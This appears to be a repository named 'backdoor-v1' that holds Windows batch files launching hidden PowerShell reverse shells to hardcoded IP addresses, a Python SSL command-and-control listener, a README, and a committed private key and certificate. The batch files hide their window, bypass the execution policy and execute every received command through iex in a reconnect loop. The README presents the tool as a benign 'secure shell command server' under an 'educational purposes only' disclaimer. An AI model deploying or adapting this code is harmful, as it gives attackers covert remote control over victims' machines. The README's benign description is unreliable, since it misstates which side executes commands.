├── shell.bat ├── reverse_shell.bat ├── c2_server.py ├── README.md └── server.pem /shell.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | powershell -NoP -NonI -W Hidden -Exec Bypass -Command "while ($true) { $client = New-Object System.Net.Sockets.TCPClient('192.168.100.131', 8080); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close() }" 3 | -------------------------------------------------------------------------------- /reverse_shell.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | powershell -NoP -NonI -W Hidden -Exec Bypass -Command " 3 | $ErrorActionPreference = 'Stop'; 4 | while ($true) { 5 | try { 6 | $client = New-Object System.Net.Sockets.TcpClient('192.168.1.5', 4444); 7 | $sslStream = New-Object System.Net.Security.SslStream($client.GetStream(), $false, ({$true} -as [Net.Security.RemoteCertificateValidationCallback])); 8 | $sslStream.AuthenticateAsClient('192.168.100.131'); 9 | [byte[]]$bytes = 0..65535|%{0}; 10 | while (($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0) { 11 | $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); 12 | $sendback = (iex $data 2>&1 | Out-String); 13 | $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; 14 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); 15 | $sslStream.Write($sendbyte, 0, $sendbyte.Length); 16 | $sslStream.Flush(); 17 | } 18 | $client.Close(); 19 | } catch { 20 | Start-Sleep -Seconds 5; 21 | } 22 | } 23 | " 24 | -------------------------------------------------------------------------------- /c2_server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import ssl 3 | 4 | def start_server(host, port): 5 | context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) 6 | context.load_cert_chain(certfile='server.pem', keyfile='server.pem') 7 | 8 | server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | server_socket.bind((host, port)) 10 | server_socket.listen(1) 11 | print(f'Listening on {host}:{port}...') 12 | 13 | conn, addr = server_socket.accept() 14 | connstream = context.wrap_socket(conn, server_side=True) 15 | print(f'Connection from {addr}') 16 | 17 | while True: 18 | command = input("Shell> ") 19 | if command.lower() in ['exit', 'quit']: 20 | connstream.send(b'exit') 21 | break 22 | connstream.send(command.encode() + b'\n') 23 | response = receive_data(connstream) 24 | print(response, end="") 25 | 26 | connstream.close() 27 | server_socket.close() 28 | 29 | def receive_data(connstream): 30 | data = b"" 31 | while True: 32 | part = connstream.recv(1024) 33 | data += part 34 | if len(part) < 1024: 35 | break 36 | return data.decode() 37 | 38 | if __name__ == '__main__': 39 | HOST = '192.168.1.90' # Listen on all available interfaces 40 | PORT = 4444 # Change to desired port 41 | start_server(HOST, PORT) 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # backdoor-v1 2 | README file for the provided server script: 3 | # Disclaimer 4 | This is for educational purposes only 5 | 6 | # README for Secure Shell Command Server 7 | # Overview 8 | This project implements a secure shell command server using Python's socket and ssl libraries. It establishes a secure connection over SSL/TLS and allows the server to execute shell commands sent from a connected client. 9 | 10 | # Features 11 | Secure Communication: The server uses SSL/TLS to encrypt data transmitted between the server and client, ensuring confidentiality and integrity. 12 | Shell Command Execution: The server can receive and execute shell commands, returning the output to the client. 13 | Interactive Shell: Users can interact with the server by inputting commands through a command-line interface. 14 | Graceful Shutdown: The server can be shut down gracefully with commands such as exit or quit. 15 | Usage 16 | # Requirements 17 | Python 3.x 18 | ssl library (included in the standard library) 19 | A valid SSL certificate (server.pem) 20 | Setup 21 | Install Python: Make sure you have Python 3.x installed on your machine. 22 | 23 | Generate SSL Certificate (if you don't have one): 24 | 25 | # bash 26 | Copy code 27 | openssl req -x509 -newkey rsa:4096 -keyout server.pem -out server.pem -days 365 -nodes 28 | Run the Server: 29 | 30 | Update the HOST and PORT variables in the script as needed. 31 | Execute the script: 32 | # bash 33 | Copy code 34 | python your_script_name.py 35 | Replace your_script_name.py with the name of your Python file. 36 | 37 | Connect a Client: Use a compatible client that can connect via SSL/TLS to send commands. 38 | 39 | Example 40 | When the server is running, you will see output indicating it is listening for connections. After a client connects, you can type shell commands directly into the server console. The server sends these commands to the client and displays the output received. 41 | 42 | Sample Interaction 43 | shell 44 | Copy code 45 | Listening on 192.168.1.5:4444... 46 | Connection from ('192.168.1.10', 54321) 47 | Shell> ls 48 | file1.txt file2.txt 49 | Shell> exit 50 | # Functions 51 | start_server(host, port) 52 | Parameters: 53 | host: The hostname or IP address to bind the server to. 54 | port: The port number to listen on. 55 | Description: Sets up an SSL/TLS server socket that listens for incoming connections. Once a connection is established, it enters an interactive loop where commands can be sent to the connected client. 56 | receive_data(connstream) 57 | Parameters: 58 | connstream: The SSL/TLS wrapped socket connection. 59 | Returns: The received data as a string. 60 | Description: Continuously receives data from the connection until no more data is available. This handles receiving command output from the client. 61 | # Security Considerations 62 | Ensure that your SSL certificate is properly configured to prevent man-in-the-middle attacks. 63 | Avoid running the server on untrusted networks to minimize the risk of unauthorized access. 64 | # License 65 | This project is licensed under the MIT License - see the LICENSE file for details. 66 | -------------------------------------------------------------------------------- /server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCaiU+vYqQHvcDI 3 | ybPRznD3zh3p7/TtQoTBgkXEHUoEuNs5PmbP0c/puBZ0sJHjIbqPWhfJyDObpbkc 4 | 4QkStXXnxJiVruLd18+q5+iFWy9ENL+zSaNIweYjsX6vmEpd83YHAR+YedNWVu0w 5 | SoMytwGjFbHqoDJ1sPcnmyA1QZbkf6/J5CqS72DWxJMzm5fQ7htVpjIkry8BmcZj 6 | hBBQra06+dHdpyiUl5CM8QjU8Y5pK+s22miBc9/acfLgAk5X344RbGLW92D+n5J6 7 | Z/Ym2hEMSG77cVUJOr2vSOyiu9RE7DmHOU+MxOFJBnimLjk+wxx77Z6pbvmt1L9j 8 | ca4IUYSnAgMBAAECggEAUE5063Z+OUuhiHZRDQGT8SLaprw88qLzrD/Pk4eI9IU/ 9 | 3zKPaQXmXtV8Te2IEplvgplV7VUthIANf3VuKpvEBspCZN66JIDG+VCEo/Br0qz6 10 | xefJg8DHoNrXM9cXJlWjiyZJTgpZCfAoWEUQguVZY2+dwoi3UDPDbICPrz1DdcAa 11 | QrxkOKu/NNzPEhX5sGcHPl3tPvAnDfANP0j9fV7LHig0oJbJLq6jwDqoSYRefdQF 12 | ydHOy+r4gcUy1WMOPEpuqrAdJ2mrdPIIGEeeYzAl2mHs9ioWFdcmcKEn4/3YJyBL 13 | B1dWazGKc5os/WsoFnM+9qtNNFCI/J37OJzGCR8FsQKBgQDMjWxVl8kCozKESXnl 14 | KmISng92Vd63giVc4Vg0N3N4jbyq3U9sMYl/1QljxW0EEZBnEerJTvj8nDZcvayo 15 | 2A3AY5C+D9fRHyXZqLPMrzpflRAARBnbKYmvsy4KfXfjBSXrXnGzE7p/XZ+V9ZT2 16 | Dl1jiInjHbawHYd2ZAH/yafUTwKBgQDBZ31KG4ZnVlnHyKbDGh6+BvMzaKpXcg0s 17 | xSbey1vNX6IFpK38SKhBHr8tisIn1ygH4pSmF5gaMWOEy8OoZ9vDdn+SSj9zBNC4 18 | oP86M36znnmSESrPLsBspUgIb2IVbYDosU/z8w+tT+Owrv0t+sUZo94EW0LOC9se 19 | /UlXDPI8KQKBgFoeIFFhSryvu4zOdjaBQq3jFvrSgAmm++D8ooh2uZeuEiXQ1LHc 20 | 7S/1YmqjSxEUz+Ko4SCJe2aHR+f55HyKmxxcgSNLBZDrQRiwm24c8QG1QVRsrFuC 21 | 5FcVAL68YjoRRZB5jmwP0AVW8Pz3MgZpc7lrKRx3NcpHaCu/iaXwaNE/AoGAcVj+ 22 | s9UH4z5XZeAx4/xF8ibOl92Kn69HC2sMSdyzE90tbtNB6K6IdYnYj49YFNNjMaPY 23 | bLM9QHSbl7N4GxWrVZX4VDtRjk5PKTWp/2k4o3qIU1PeXAhRXBtN6SumN1qzBy0L 24 | 57QXBwLgNaeI2E60/z7rmnAF6g5GwJW/StZajWkCgYAVeV/YckJwwHZQqQQKQ7PN 25 | f52RO/RKL4ddUFdkIFjrHi80tOh2ebwR6RafTyVLKreT0ATe20PolV/uvmMVmxlV 26 | 277MoWbXBiYKqMNp3mQBMWBjkPpmEhn0xGwojNnMPpkca0fFEh4lx037jZOHvUsk 27 | FzJeJNGf02fg1LeZnnfvNA== 28 | -----END PRIVATE KEY----- 29 | -----BEGIN CERTIFICATE----- 30 | MIIEFTCCAv2gAwIBAgIUMu+Ls6UKJ0LOa5N9cok5gomsosswDQYJKoZIhvcNAQEL 31 | BQAwgZkxCzAJBgNVBAYTAktFMRAwDgYDVQQIDAdFYXN0ZXJuMRAwDgYDVQQHDAdO 32 | YWlyb2JpMRYwFAYDVQQKDA1JbGx1c2l2ZWhhY2tzMQ4wDAYDVQQLDAVoYWNrczEW 33 | MBQGA1UEAwwNaWxsdXNpdmVoYWNrczEmMCQGCSqGSIb3DQEJARYXZXhhbXBsZTEy 34 | M3d3d0BnbWFpbC5jb20wHhcNMjQwNjEyMDkwNTM2WhcNMjUwNjEyMDkwNTM2WjCB 35 | mTELMAkGA1UEBhMCS0UxEDAOBgNVBAgMB0Vhc3Rlcm4xEDAOBgNVBAcMB05haXJv 36 | YmkxFjAUBgNVBAoMDUlsbHVzaXZlaGFja3MxDjAMBgNVBAsMBWhhY2tzMRYwFAYD 37 | VQQDDA1pbGx1c2l2ZWhhY2tzMSYwJAYJKoZIhvcNAQkBFhdleGFtcGxlMTIzd3d3 38 | QGdtYWlsLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJqJT69i 39 | pAe9wMjJs9HOcPfOHenv9O1ChMGCRcQdSgS42zk+Zs/Rz+m4FnSwkeMhuo9aF8nI 40 | M5uluRzhCRK1defEmJWu4t3Xz6rn6IVbL0Q0v7NJo0jB5iOxfq+YSl3zdgcBH5h5 41 | 01ZW7TBKgzK3AaMVseqgMnWw9yebIDVBluR/r8nkKpLvYNbEkzObl9DuG1WmMiSv 42 | LwGZxmOEEFCtrTr50d2nKJSXkIzxCNTxjmkr6zbaaIFz39px8uACTlffjhFsYtb3 43 | YP6fknpn9ibaEQxIbvtxVQk6va9I7KK71ETsOYc5T4zE4UkGeKYuOT7DHHvtnqlu 44 | +a3Uv2NxrghRhKcCAwEAAaNTMFEwHQYDVR0OBBYEFFvhk3LkhquWrBy7U8Rkbx5p 45 | YnoBMB8GA1UdIwQYMBaAFFvhk3LkhquWrBy7U8Rkbx5pYnoBMA8GA1UdEwEB/wQF 46 | MAMBAf8wDQYJKoZIhvcNAQELBQADggEBAENxwYukNg5ltbkApwNTbNgyhFjOyvAl 47 | WxEBNdb1HsDFPJEYRig423Dyf13d8JFfIV7pJR0i4LgC9bBe4Z5wZT2B+198T8bY 48 | loy8B0xD+BgaUNSVfr76faF/MgPwX961U/vGMtNWQuRH0N4Of09YQo2oFzByP167 49 | 90wHuIXmNfZs00v7r8+77DylbHm2REn0Dslsfz1l3OvHyJOHNSxTpsYXHWE3jka5 50 | l3qwqb7XDEeHH2llYntc7XCjcSUCjgVncUSps7b2pD5O0N07i1pcLSjEGDpwI+Ua 51 | h24JFhMbWbCRhtmp3T3btZWvr/26fRlf0Xx9jO3EsqHcyZI3XgHFg9s= 52 | -----END CERTIFICATE----- 53 | --------------------------------------------------------------------------------